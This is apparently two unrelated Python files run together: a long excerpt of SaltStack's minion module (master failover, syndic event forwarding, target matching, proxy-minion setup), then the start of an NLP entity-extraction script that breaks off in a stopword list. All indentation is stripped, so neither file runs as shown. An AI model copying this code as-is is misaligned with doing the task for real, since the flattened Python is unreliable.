self.grains_cache = self.opts['grains']
elif package.startswith('environ_setenv'):
self.environ_setenv(tag, data)
elif package.startswith('_minion_mine'):
self._mine_send(tag, data)
elif package.startswith('fire_master'):
log.debug('Forwarding master event tag={tag}'.format(tag=data['tag']))
self._fire_master(data['data'], data['tag'], data['events'], data['pretag'])
elif package.startswith('__master_disconnected'):
tag, data = salt.utils.event.MinionEvent.unpack(tag, data)
# if the master disconnect event is for a different master, raise an exception
if data['master'] != self.opts['master']:
raise Exception()
if self.connected:
# we are not connected anymore
self.connected = False
# modify the scheduled job to fire only on reconnect
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 2,
'kwargs': {'master': self.opts['master'],
'connected': False}
}
self.schedule.modify_job(name='__master_alive',
schedule=schedule)
log.info('Connection to master {0} lost'.format(self.opts['master']))
if self.opts['master_type'] == 'failover':
log.info('Trying to tune in to next master from master-list')
# if eval_master finds a new master for us, self.connected
# will be True again on successful master authentication
self.opts['master'] = self.eval_master(opts=self.opts,
failed=True)
if self.connected:
# re-init the subsystems to work with the new master
log.info('Re-initialising subsystems for new '
'master {0}'.format(self.opts['master']))
del self.pub_channel
self._connect_master_future = self.connect_master()
self.block_until_connected() # TODO: remove # pylint: disable=no-member
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self._fire_master_minion_start()
log.info('Minion is ready to receive requests!')
# update scheduled job to run with the new master addr
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 2,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
self.schedule.modify_job(name='__master_alive',
schedule=schedule)
elif package.startswith('__master_connected'):
# handle this event only once. otherwise it will pollute the log
if not self.connected:
log.info('Connection to master {0} re-established'.format(self.opts['master']))
self.connected = True
# modify the __master_alive job to only fire,
# if the connection is lost again
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 2,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
self.schedule.modify_job(name='__master_alive',
schedule=schedule)
elif package.startswith('_salt_error'):
log.debug('Forwarding salt error event tag={tag}'.format(tag=tag))
self._fire_master(data, tag)
def _fallback_cleanups(self):
'''
Fallback cleanup routines, attempting to fix leaked processes, threads, etc.
'''
# Add an extra fallback in case a forked process leaks through
multiprocessing.active_children()
# Cleanup Windows threads
if not salt.utils.is_windows():
return
for thread in self.win_proc:
if not thread.is_alive():
thread.join()
try:
self.win_proc.remove(thread)
del thread
except (ValueError, NameError):
pass
# Main Minion Tune In
def tune_in(self, start=True):
'''
Lock onto the publisher. This is the main event loop for the minion
:rtype : None
'''
self._pre_tune()
# Properly exit if a SIGTERM is signalled
if signal.getsignal(signal.SIGTERM) is signal.SIG_DFL:
# No SIGTERM installed, install ours
signal.signal(signal.SIGTERM, self.clean_die)
# start up the event publisher, so we can see events during startup
self.event_publisher = salt.utils.event.AsyncEventPublisher(
self.opts,
self.handle_event,
io_loop=self.io_loop,
)
log.debug('Minion \'{0}\' trying to tune in'.format(self.opts['id']))
if start:
self.sync_connect_master()
self._fire_master_minion_start()
log.info('Minion is ready to receive requests!')
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
# Make sure to gracefully handle CTRL_LOGOFF_EVENT
salt.utils.enable_ctrl_logoff_handler()
# On first startup execute a state run if configured to do so
self._state_run()
loop_interval = self.opts['loop_interval']
try:
if self.opts['grains_refresh_every']: # If exists and is not zero. In minutes, not seconds!
if self.opts['grains_refresh_every'] > 1:
log.debug(
'Enabling the grains refresher. Will run every {0} minutes.'.format(
self.opts['grains_refresh_every'])
)
else: # Clean up minute vs. minutes in log message
log.debug(
'Enabling the grains refresher. Will run every {0} minute.'.format(
self.opts['grains_refresh_every'])
)
self._refresh_grains_watcher(
abs(self.opts['grains_refresh_every'])
)
except Exception as exc:
log.error(
'Exception occurred in attempt to initialize grain refresh routine during minion tune-in: {0}'.format(
exc)
)
self.periodic_callbacks = {}
# schedule the stuff that runs every interval
ping_interval = self.opts.get('ping_interval', 0) * 60
if ping_interval > 0:
def ping_master():
if not self._fire_master('ping', 'minion_ping'):
if not self.opts.get('auth_safemode', True):
log.error('** Master Ping failed. Attempting to restart minion**')
delay = self.opts.get('random_reauth_delay', 5)
log.info('delaying random_reauth_delay {0}s'.format(delay))
# regular sys.exit raises an exception -- which isn't sufficient in a thread
os._exit(salt.defaults.exitcodes.SALT_KEEPALIVE)
self.periodic_callbacks['ping'] = tornado.ioloop.PeriodicCallback(ping_master, ping_interval * 1000, io_loop=self.io_loop)
self.periodic_callbacks['cleanup'] = tornado.ioloop.PeriodicCallback(self._fallback_cleanups, loop_interval * 1000, io_loop=self.io_loop)
def handle_beacons():
# Process Beacons
try:
beacons = self.process_beacons(self.functions)
except Exception:
log.critical('The beacon errored: ', exc_info=True)
if beacons:
self._fire_master(events=beacons)
self.periodic_callbacks['beacons'] = tornado.ioloop.PeriodicCallback(handle_beacons, loop_interval * 1000, io_loop=self.io_loop)
# TODO: actually listen to the return and change period
def handle_schedule():
self.process_schedule(self, loop_interval)
self.periodic_callbacks['schedule'] = tornado.ioloop.PeriodicCallback(handle_schedule, 1000, io_loop=self.io_loop)
# start all the other callbacks
for periodic_cb in six.itervalues(self.periodic_callbacks):
periodic_cb.start()
# add handler to subscriber
self.pub_channel.on_recv(self._handle_payload)
if start:
self.io_loop.start()
def _handle_payload(self, payload):
if payload is not None and self._target_load(payload['load']):
self._handle_decoded_payload(payload['load'])
def _target_load(self, load):
# Verify that the publication is valid
if 'tgt' not in load or 'jid' not in load or 'fun' not in load \
or 'arg' not in load:
return False
# Verify that the publication applies to this minion
# It's important to note that the master does some pre-processing
# to determine which minions to send a request to. So for example,
# a "salt -G 'grain_key:grain_val' test.ping" will invoke some
# pre-processing on the master and this minion should not see the
# publication if the master does not determine that it should.
if 'tgt_type' in load:
match_func = getattr(self.matcher,
'{0}_match'.format(load['tgt_type']), None)
if match_func is None:
return False
if load['tgt_type'] in ('grain', 'grain_pcre', 'pillar'):
delimiter = load.get('delimiter', DEFAULT_TARGET_DELIM)
if not match_func(load['tgt'], delimiter=delimiter):
return False
elif not match_func(load['tgt']):
return False
else:
if not self.matcher.glob_match(load['tgt']):
return False
return True
def destroy(self):
'''
Tear down the minion
'''
self._running = False
if hasattr(self, 'schedule'):
del self.schedule
if hasattr(self, 'pub_channel'):
self.pub_channel.on_recv(None)
del self.pub_channel
if hasattr(self, 'periodic_callbacks'):
for cb in six.itervalues(self.periodic_callbacks):
cb.stop()
def __del__(self):
self.destroy()
class Syndic(Minion):
'''
Make a Syndic minion, this minion will use the minion keys on the
master to authenticate with a higher level master.
'''
def __init__(self, opts, **kwargs):
self._syndic_interface = opts.get('interface')
self._syndic = True
# force auth_safemode True because Syndic don't support autorestart
opts['auth_safemode'] = True
opts['loop_interval'] = 1
super(Syndic, self).__init__(opts, **kwargs)
self.mminion = salt.minion.MasterMinion(opts)
self.jid_forward_cache = set()
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
# TODO: even do this??
data['to'] = int(data.get('to', self.opts['timeout'])) - 1
# Only forward the command if it didn't originate from ourselves
if data.get('master_id', 0) != self.opts.get('master_id', 1):
self.syndic_cmd(data)
def syndic_cmd(self, data):
'''
Take the now clear load and forward it on to the client cmd
'''
# Set up default tgt_type
if 'tgt_type' not in data:
data['tgt_type'] = 'glob'
kwargs = {}
# optionally add a few fields to the publish data
for field in ('master_id', # which master the job came from
'user', # which user ran the job
):
if field in data:
kwargs[field] = data[field]
try:
# Send out the publication
self.local.pub(data['tgt'],
data['fun'],
data['arg'],
data['tgt_type'],
data['ret'],
data['jid'],
data['to'],
**kwargs)
except Exception as exc:
log.warning('Unable to forward pub data: {0}'.format(exc))
def _fire_master_syndic_start(self):
# Send an event to the master that the minion is live
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'syndic_start'
)
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'syndic'),
)
# Syndic Tune In
def tune_in(self, start=True):
'''
Lock onto the publisher. This is the main event loop for the syndic
'''
# Properly exit if a SIGTERM is signalled
if signal.getsignal(signal.SIGTERM) is signal.SIG_DFL:
# No SIGTERM installed, install ours
signal.signal(signal.SIGTERM, self.clean_die)
log.debug('Syndic \'{0}\' trying to tune in'.format(self.opts['id']))
if start:
self.sync_connect_master()
# Instantiate the local client
self.local = salt.client.get_local_client(self.opts['_minion_conf_file'])
self.local.event.subscribe('')
self.local.opts['interface'] = self._syndic_interface
# add handler to subscriber
self.pub_channel.on_recv(self._process_cmd_socket)
# register the event sub to the poller
self._reset_event_aggregation()
self.local_event_stream = zmq.eventloop.zmqstream.ZMQStream(self.local.event.sub, io_loop=self.io_loop)
self.local_event_stream.on_recv(self._process_event)
# forward events every syndic_event_forward_timeout
self.forward_events = tornado.ioloop.PeriodicCallback(self._forward_events,
self.opts['syndic_event_forward_timeout'] * 1000,
io_loop=self.io_loop)
self.forward_events.start()
# Send an event to the master that the minion is live
self._fire_master_syndic_start()
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
if start:
self.io_loop.start()
# TODO: clean up docs
def tune_in_no_block(self):
'''
Executes the tune_in sequence but omits extra logging and the
management of the event bus assuming that these are handled outside
the tune_in sequence
'''
# Instantiate the local client
self.local = salt.client.get_local_client(self.opts['_minion_conf_file'])
# add handler to subscriber
self.pub_channel.on_recv(self._process_cmd_socket)
def _process_cmd_socket(self, payload):
if payload is not None:
log.trace('Handling payload') # pylint: disable=no-member
self._handle_decoded_payload(payload['load'])
def _reset_event_aggregation(self):
self.jids = {}
self.raw_events = []
def _process_event(self, raw):
# TODO: cleanup: Move down into event class
raw = raw[0]
mtag, data = self.local.event.unpack(raw, self.local.event.serial)
event = {'data': data, 'tag': mtag}
log.trace('Got event {0}'.format(event['tag'])) # pylint: disable=no-member
tag_parts = event['tag'].split('/')
if len(tag_parts) >= 4 and tag_parts[1] == 'job' and \
salt.utils.jid.is_jid(tag_parts[2]) and tag_parts[3] == 'ret' and \
'return' in event['data']:
if 'jid' not in event['data']:
# Not a job return
return
jdict = self.jids.setdefault(event['tag'], {})
if not jdict:
jdict['__fun__'] = event['data'].get('fun')
jdict['__jid__'] = event['data']['jid']
jdict['__load__'] = {}
fstr = '{0}.get_load'.format(self.opts['master_job_cache'])
# Only need to forward each load once. Don't hit the disk
# for every minion return!
if event['data']['jid'] not in self.jid_forward_cache:
jdict['__load__'].update(
self.mminion.returners[fstr](event['data']['jid'])
)
self.jid_forward_cache.add(event['data']['jid'])
if len(self.jid_forward_cache) > self.opts['syndic_jid_forward_cache_hwm']:
# Pop the oldest jid from the cache
tmp = sorted(list(self.jid_forward_cache))
tmp.pop(0)
self.jid_forward_cache = set(tmp)
if 'master_id' in event['data']:
# __'s to make sure it doesn't print out on the master cli
jdict['__master_id__'] = event['data']['master_id']
jdict[event['data']['id']] = event['data']['return']
else:
# Add generic event aggregation here
if 'retcode' not in event['data']:
self.raw_events.append(event)
def _forward_events(self):
log.trace('Forwarding events') # pylint: disable=no-member
if self.raw_events:
self._fire_master(events=self.raw_events,
pretag=tagify(self.opts['id'], base='syndic'),
)
for jid in self.jids:
self._return_pub(self.jids[jid],
'_syndic_return',
timeout=self._return_retry_timer())
self._reset_event_aggregation()
def destroy(self):
'''
Tear down the syndic minion
'''
# We borrowed the local clients poller so give it back before
# it's destroyed. Reset the local poller reference.
super(Syndic, self).destroy()
if hasattr(self, 'local'):
del self.local
if hasattr(self, 'forward_events'):
self.forward_events.stop()
# TODO: consolidate syndic classes together?
# need a way of knowing if the syndic connection is busted
class MultiSyndic(MinionBase):
'''
Make a MultiSyndic minion, this minion will handle relaying jobs and returns from
all minions connected to it to the list of masters it is connected to.
Modes (controlled by `syndic_mode`:
sync: This mode will synchronize all events and publishes from higher level masters
cluster: This mode will only sync job publishes and returns
Note: jobs will be returned best-effort to the requesting master. This also means
(since we are using zmq) that if a job was fired and the master disconnects
between the publish and return, that the return will end up in a zmq buffer
in this Syndic headed to that original master.
In addition, since these classes all seem to use a mix of blocking and non-blocking
calls (with varying timeouts along the way) this daemon does not handle failure well,
it will (under most circumstances) stall the daemon for ~15s trying to forward events
to the down master
'''
# time to connect to upstream master
SYNDIC_CONNECT_TIMEOUT = 5
SYNDIC_EVENT_TIMEOUT = 5
def __init__(self, opts, io_loop=None):
opts['loop_interval'] = 1
super(MultiSyndic, self).__init__(opts)
self.mminion = salt.minion.MasterMinion(opts)
# sync (old behavior), cluster (only returns and publishes)
self.syndic_mode = self.opts.get('syndic_mode', 'sync')
self.auth_wait = self.opts['acceptance_wait_time']
self.max_auth_wait = self.opts['acceptance_wait_time_max']
self._has_master = threading.Event()
self.jid_forward_cache = set()
if io_loop is None:
zmq.eventloop.ioloop.install()
self.io_loop = zmq.eventloop.ioloop.ZMQIOLoop()
else:
self.io_loop = io_loop
def _spawn_syndics(self):
'''
Spawn all the coroutines which will sign in the syndics
'''
self._syndics = {} # mapping of opts['master'] -> syndic
for master in set(self.opts['master']):
s_opts = copy.copy(self.opts)
s_opts['master'] = master
self._syndics[master] = self._connect_syndic(s_opts)
@tornado.gen.coroutine
def _connect_syndic(self, opts):
'''
Create a syndic, and asynchronously connect it to a master
'''
last = 0 # never have we signed in
auth_wait = opts['acceptance_wait_time']
while True:
log.debug('Syndic attempting to connect to {0}'.format(opts['master']))
try:
syndic = Syndic(opts,
timeout=self.SYNDIC_CONNECT_TIMEOUT,
safe=False,
io_loop=self.io_loop,
)
yield syndic.connect_master()
# set up the syndic to handle publishes (specifically not event forwarding)
syndic.tune_in_no_block()
log.info('Syndic successfully connected to {0}'.format(opts['master']))
break
except SaltClientError as exc:
log.error('Error while bringing up syndic for multi-syndic. Is master at {0} responding?'.format(opts['master']))
last = time.time()
if auth_wait < self.max_auth_wait:
auth_wait += self.auth_wait
yield tornado.gen.sleep(auth_wait) # TODO: log?
except KeyboardInterrupt:
raise
except: # pylint: disable=W0702
log.critical('Unexpected error while connecting to {0}'.format(opts['master']), exc_info=True)
raise tornado.gen.Return(syndic)
def _mark_master_dead(self, master):
'''
Mark a master as dead. This will start the sign-in routine
'''
# if its connected, mark it dead
if self._syndics[master].done():
syndic = self._syndics.result() # pylint: disable=no-member
syndic.destroy()
self._syndics[master] = self._connect_syndic(syndic.opts)
else:
log.info('Attempting to mark {0} as dead, although it is already marked dead'.format(master)) # TODO: debug?
def _call_syndic(self, func, args=(), kwargs=None, master_id=None):
'''
Wrapper to call a given func on a syndic, best effort to get the one you asked for
'''
if kwargs is None:
kwargs = {}
for master, syndic_future in self.iter_master_options(master_id):
if not syndic_future.done() or syndic_future.exception():
log.error('Unable to call {0} on {1}, that syndic is not connected'.format(func, master_id))
continue
try:
getattr(syndic_future.result(), func)(*args, **kwargs)
return
except SaltClientError:
log.error('Unable to call {0} on {1}, trying another...'.format(func, master_id))
self._mark_master_dead(master)
continue
log.critical('Unable to call {0} on any masters!'.format(func))
def iter_master_options(self, master_id=None):
'''
Iterate (in order) over your options for master
'''
masters = list(self._syndics.keys())
shuffle(masters)
if master_id not in self._syndics:
master_id = masters.pop(0)
else:
masters.remove(master_id)
while True:
yield master_id, self._syndics[master_id]
if len(masters) == 0:
break
master_id = masters.pop(0)
def _reset_event_aggregation(self):
self.jids = {}
self.raw_events = []
# Syndic Tune In
def tune_in(self):
'''
Lock onto the publisher. This is the main event loop for the syndic
'''
self._spawn_syndics()
# Instantiate the local client
self.local = salt.client.get_local_client(self.opts['_minion_conf_file'])
self.local.event.subscribe('')
log.debug('MultiSyndic \'{0}\' trying to tune in'.format(self.opts['id']))
# register the event sub to the poller
self._reset_event_aggregation()
self.local_event_stream = zmq.eventloop.zmqstream.ZMQStream(self.local.event.sub, io_loop=self.io_loop)
self.local_event_stream.on_recv(self._process_event)
# forward events every syndic_event_forward_timeout
self.forward_events = tornado.ioloop.PeriodicCallback(self._forward_events,
self.opts['syndic_event_forward_timeout'] * 1000,
io_loop=self.io_loop)
self.forward_events.start()
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
self.io_loop.start()
def _process_event(self, raw):
# TODO: cleanup: Move down into event class
raw = raw[0]
mtag, data = self.local.event.unpack(raw, self.local.event.serial)
event = {'data': data, 'tag': mtag}
log.trace('Got event {0}'.format(event['tag'])) # pylint: disable=no-member
tag_parts = event['tag'].split('/')
if len(tag_parts) >= 4 and tag_parts[1] == 'job' and \
salt.utils.jid.is_jid(tag_parts[2]) and tag_parts[3] == 'ret' and \
'return' in event['data']:
if 'jid' not in event['data']:
# Not a job return
return
if self.syndic_mode == 'cluster' and event['data'].get('master_id', 0) == self.opts.get('master_id', 1):
log.debug('Return received with matching master_id, not forwarding')
return
jdict = self.jids.setdefault(event['tag'], {})
if not jdict:
jdict['__fun__'] = event['data'].get('fun')
jdict['__jid__'] = event['data']['jid']
jdict['__load__'] = {}
fstr = '{0}.get_load'.format(self.opts['master_job_cache'])
# Only need to forward each load once. Don't hit the disk
# for every minion return!
if event['data']['jid'] not in self.jid_forward_cache:
jdict['__load__'].update(
self.mminion.returners[fstr](event['data']['jid'])
)
self.jid_forward_cache.add(event['data']['jid'])
if len(self.jid_forward_cache) > self.opts['syndic_jid_forward_cache_hwm']:
# Pop the oldest jid from the cache
tmp = sorted(list(self.jid_forward_cache))
tmp.pop(0)
self.jid_forward_cache = set(tmp)
if 'master_id' in event['data']:
# __'s to make sure it doesn't print out on the master cli
jdict['__master_id__'] = event['data']['master_id']
jdict[event['data']['id']] = event['data']['return']
else:
# TODO: config to forward these? If so we'll have to keep track of who
# has seen them
# if we are the top level masters-- don't forward all the minion events
if self.syndic_mode == 'sync':
# Add generic event aggregation here
if 'retcode' not in event['data']:
self.raw_events.append(event)
def _forward_events(self):
log.trace('Forwarding events') # pylint: disable=no-member
if self.raw_events:
self._call_syndic('_fire_master',
kwargs={'events': self.raw_events,
'pretag': tagify(self.opts['id'], base='syndic'),
'timeout': self.SYNDIC_EVENT_TIMEOUT,
},
)
for jid, jid_ret in self.jids.items():
self._call_syndic('_return_pub',
args=(jid_ret, '_syndic_return'),
kwargs={'timeout': self.SYNDIC_EVENT_TIMEOUT},
master_id=jid_ret.get('__master_id__'),
)
self._reset_event_aggregation()
class Matcher(object):
'''
Use to return the value for matching calls from the master
'''
def __init__(self, opts, functions=None):
self.opts = opts
self.functions = functions
def confirm_top(self, match, data, nodegroups=None):
'''
Takes the data passed to a top file environment and determines if the
data matches this minion
'''
matcher = 'compound'
if not data:
log.error('Received bad data when setting the match from the top '
'file')
return False
for item in data:
if isinstance(item, dict):
if 'match' in item:
matcher = item['match']
if hasattr(self, matcher + '_match'):
funcname = '{0}_match'.format(matcher)
if matcher == 'nodegroup':
return getattr(self, funcname)(match, nodegroups)
return getattr(self, funcname)(match)
else:
log.error('Attempting to match with unknown matcher: {0}'.format(
matcher
))
return False
def glob_match(self, tgt):
'''
Returns true if the passed glob matches the id
'''
if not isinstance(tgt, six.string_types):
return False
return fnmatch.fnmatch(self.opts['id'], tgt)
def pcre_match(self, tgt):
'''
Returns true if the passed pcre regex matches
'''
return bool(re.match(tgt, self.opts['id']))
def list_match(self, tgt):
'''
Determines if this host is on the list
'''
if isinstance(tgt, six.string_types):
tgt = tgt.split(',')
return bool(self.opts['id'] in tgt)
def grain_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the grains glob match
'''
log.debug('grains target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for grains match '
'statement from master')
return False
return salt.utils.subdict_match(
self.opts['grains'], tgt, delimiter=delimiter
)
def grain_pcre_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Matches a grain based on regex
'''
log.debug('grains pcre target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for grains pcre match '
'statement from master')
return False
return salt.utils.subdict_match(self.opts['grains'], tgt,
delimiter=delimiter, regex_match=True)
def data_match(self, tgt):
'''
Match based on the local data store on the minion
'''
if self.functions is None:
utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(self.opts, utils=utils)
comps = tgt.split(':')
if len(comps) < 2:
return False
val = self.functions['data.getval'](comps[0])
if val is None:
# The value is not defined
return False
if isinstance(val, list):
# We are matching a single component to a single list member
for member in val:
if fnmatch.fnmatch(str(member).lower(), comps[1].lower()):
return True
return False
if isinstance(val, dict):
if comps[1] in val:
return True
return False
return bool(fnmatch.fnmatch(
val,
comps[1],
))
def pillar_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the pillar glob match
'''
log.debug('pillar target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar match '
'statement from master')
return False
return salt.utils.subdict_match(
self.opts['pillar'], tgt, delimiter=delimiter
)
def pillar_pcre_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the pillar pcre match
'''
log.debug('pillar PCRE target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar PCRE match '
'statement from master')
return False
return salt.utils.subdict_match(
self.opts['pillar'], tgt, delimiter=delimiter, regex_match=True
)
def pillar_exact_match(self, tgt, delimiter=':'):
'''
Reads in the pillar match, no globbing, no PCRE
'''
log.debug('pillar target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar match '
'statement from master')
return False
return salt.utils.subdict_match(self.opts['pillar'],
tgt,
delimiter=delimiter,
exact_match=True)
def ipcidr_match(self, tgt):
'''
Matches based on IP address or CIDR notation
'''
try:
tgt = ipaddress.ip_network(tgt)
# Target is a network
proto = 'ipv{0}'.format(tgt.version)
if proto not in self.opts['grains']:
return False
else:
return salt.utils.network.in_subnet(tgt, self.opts['grains'][proto])
except: # pylint: disable=bare-except
try:
# Target should be an address
proto = 'ipv{0}'.format(ipaddress.ip_address(tgt).version)
if proto not in self.opts['grains']:
return False
else:
return tgt in self.opts['grains'][proto]
except: # pylint: disable=bare-except
log.error('Invalid IP/CIDR target {0}"'.format(tgt))
return False
def range_match(self, tgt):
'''
Matches based on range cluster
'''
if HAS_RANGE:
range_ = seco.range.Range(self.opts['range_server'])
try:
return self.opts['grains']['fqdn'] in range_.expand(tgt)
except seco.range.RangeException as exc:
log.debug('Range exception in compound match: {0}'.format(exc))
return False
return False
def compound_match(self, tgt):
'''
Runs the compound target check
'''
if not isinstance(tgt, six.string_types) and not isinstance(tgt, (list, tuple)):
log.error('Compound target received that is neither string, list nor tuple')
return False
log.debug('compound_match: {0} ? {1}'.format(self.opts['id'], tgt))
ref = {'G': 'grain',
'P': 'grain_pcre',
'I': 'pillar',
'J': 'pillar_pcre',
'L': 'list',
'N': None, # Nodegroups should already be expanded
'S': 'ipcidr',
'E': 'pcre'}
if HAS_RANGE:
ref['R'] = 'range'
results = []
opers = ['and', 'or', 'not', '(', ')']
if isinstance(tgt, six.string_types):
words = tgt.split()
else:
words = tgt
for word in words:
target_info = salt.utils.minions.parse_target(word)
# Easy check first
if word in opers:
if results:
if results[-1] == '(' and word in ('and', 'or'):
log.error('Invalid beginning operator after "(": {0}'.format(word))
return False
if word == 'not':
if not results[-1] in ('and', 'or', '('):
results.append('and')
results.append(word)
else:
# seq start with binary oper, fail
if word not in ['(', 'not']:
log.error('Invalid beginning operator: {0}'.format(word))
return False
results.append(word)
elif target_info and target_info['engine']:
if 'N' == target_info['engine']:
# Nodegroups should already be expanded/resolved to other engines
log.error('Detected nodegroup expansion failure of "{0}"'.format(word))
return False
engine = ref.get(target_info['engine'])
if not engine:
# If an unknown engine is called at any time, fail out
log.error('Unrecognized target engine "{0}" for'
' target expression "{1}"'.format(
target_info['engine'],
word,
)
)
return False
engine_args = [target_info['pattern']]
engine_kwargs = {}
if target_info['delimiter']:
engine_kwargs['delimiter'] = target_info['delimiter']
results.append(
str(getattr(self, '{0}_match'.format(engine))(*engine_args, **engine_kwargs))
)
else:
# The match is not explicitly defined, evaluate it as a glob
results.append(str(self.glob_match(word)))
results = ' '.join(results)
log.debug('compound_match {0} ? "{1}" => "{2}"'.format(self.opts['id'], tgt, results))
try:
return eval(results) # pylint: disable=W0123
except Exception:
log.error('Invalid compound target: {0} for results: {1}'.format(tgt, results))
return False
return False
def nodegroup_match(self, tgt, nodegroups):
'''
This is a compatibility matcher and is NOT called when using
nodegroups for remote execution, but is called when the nodegroups
matcher is used in states
'''
if tgt in nodegroups:
return self.compound_match(
salt.utils.minions.nodegroup_comp(tgt, nodegroups)
)
return False
class ProxyMinion(Minion):
'''
This class instantiates a 'proxy' minion--a minion that does not manipulate
the host it runs on, but instead manipulates a device that cannot run a minion.
'''
# TODO: better name...
@tornado.gen.coroutine
def _post_master_init(self, master):
'''
Function to finish init after connecting to a master
This is primarily loading modules, pillars, etc. (since they need
to know which master they connected to)
'''
log.debug("subclassed _post_master_init")
self.opts['master'] = master
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
if 'proxy' not in self.opts['pillar']:
log.error('No proxy key found in pillar for id '+self.opts['id']+'.')
log.error('Check your pillar configuration and contents. Salt-proxy aborted.')
self._running = False
raise SaltSystemExit(code=-1)
fq_proxyname = self.opts['pillar']['proxy']['proxytype']
self.opts['proxy'] = self.opts['pillar']['proxy']
# We need to do this again, because we are going to throw out a lot of grains.
self.opts['grains'] = salt.loader.grains(self.opts)
# Need to load the modules so they get all the dunder variables
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
# we can then sync any proxymodules down from the master
self.functions['saltutil.sync_proxymodules'](saltenv='base')
# Then load the proxy module
self.proxy = salt.loader.proxy(self.opts)
# And re-load the modules so the __proxy__ variable gets injected
self.functions, self.returners, self.function_errors, self.executors = self._load_modules(proxy=self.proxy)
self.functions.pack['__proxy__'] = self.proxy
self.proxy.pack['__salt__'] = self.functions
self.proxy.pack['__ret__'] = self.returners
if ('{0}.init'.format(fq_proxyname) not in self.proxy
or '{0}.shutdown'.format(fq_proxyname) not in self.proxy):
log.error('Proxymodule {0} is missing an init() or a shutdown() or both.'.format(fq_proxyname))
log.error('Check your proxymodule. Salt-proxy aborted.')
self._running = False
raise SaltSystemExit(code=-1)
proxy_init_fn = self.proxy[fq_proxyname+'.init']
proxy_init_fn(self.opts)
self.opts['grains'] = salt.loader.grains(self.opts)
# Check config 'add_proxymodule_to_opts' Remove this in Boron.
if self.opts['add_proxymodule_to_opts']:
self.opts['proxymodule'] = self.proxy
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
self.matcher = Matcher(self.opts, self.functions)
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
uid = salt.utils.get_uid(user=self.opts.get('user', None))
self.proc_dir = get_proc_dir(self.opts['cachedir'], uid=uid)
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners)
# add default scheduling jobs to the minions scheduler
if self.opts['mine_enabled'] and 'mine.update' in self.functions:
self.schedule.add_job({
'__mine_interval':
{
'function': 'mine.update',
'minutes': self.opts['mine_interval'],
'jid_include': True,
'maxrunning': 2,
'return_job': self.opts.get('mine_return_job', False)
}
}, persist=True)
log.info('Added mine.update to scheduler')
else:
self.schedule.delete_job('__mine_interval', persist=True)
# add master_alive job if enabled
if self.opts['master_alive_interval'] > 0:
self.schedule.add_job({
'__master_alive':
{
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
}, persist=True)
self.grains_cache = self.opts['grains']
|
SatadishaModule_final_trie.py
|
# coding: utf-8
# In[298]:
import sys
import re
import string
import csv
import random
import time
#import binascii
#import shlex
import numpy as np
import pandas as pd
from itertools import groupby
from operator import itemgetter
from collections import Iterable, OrderedDict
from nltk.tokenize import sent_tokenize, word_tokenize
from nltk.corpus import stopwords
from scipy import stats
#from datasketch import MinHash, MinHashLSH
import NE_candidate_module as ne
import NE_candidate_module as ne
import Mention
import threading, queue
import time
import datetime
import copy
import trie as trie
# In[324]:
#---------------------Existing Lists--------------------
cachedStopWords = stopwords.words("english")
tempList=["i","and","or","other","another","across","were","you","then","still","is","while","till","nor","perhaps","otherwise","until","sometimes","sometime","seem","cannot","seems","because","can","like","into","able","unable","either","neither","if","we","it","else","elsewhere","how","not","what","who","when","where","where's","where’s","where'd","where’d","where'll","where’ll","who's","who’s","he's","he’s","he’d","he'd","she's","she’s","she’d","she'd","let","today","tomorrow","tonight","let's","let’s","lets","know","make","oh","via","i","yet","must","mustnt","mustn't","mustn’t","i'll","i’ll","you'll","you’ll","we'll","we’ll","done","doesnt","doesn't","doesn’t","dont","don't","don’t","did","didnt","didn't","didn’t","much","without","could","couldn't","couldn’t","would","wouldn't","wouldn’t","should","shouldn't","shouldn’t","shall","isn't","isn’t","hasn't","hasn’t","was","wasn't","wasn’t","also","let's","let’s","let","well","just","everyone","anyone","noone","none","someone","theres","there's","there’s","everybody","nobody","somebody","anything","else","elsewhere","something","nothing","everything","i'd","i’d","i’m","won't","won’t","i’ve","i've","they're","they’re","we’re","we're","we'll","we’ll","we’ve","we've","they’ve","they've","they’d","they'd","they’ll","they'll","again","you're","you’re","you've","you’ve","thats","that's",'that’s','here’s',"here's","what's","what’s","i’m","i'm","a","so","except","arn't","aren't","arent","this","when","it","it’s","it's","he's","she's","she'd","he'd","he'll","she'll","she’ll","many","can't","cant","can’t","werent","weren't","were’t","even","yes","no","these","here","there","to","maybe","<hashtag>","<hashtag>.","ever","every","never","there's","there’s","whenever","wherever","however","whatever","a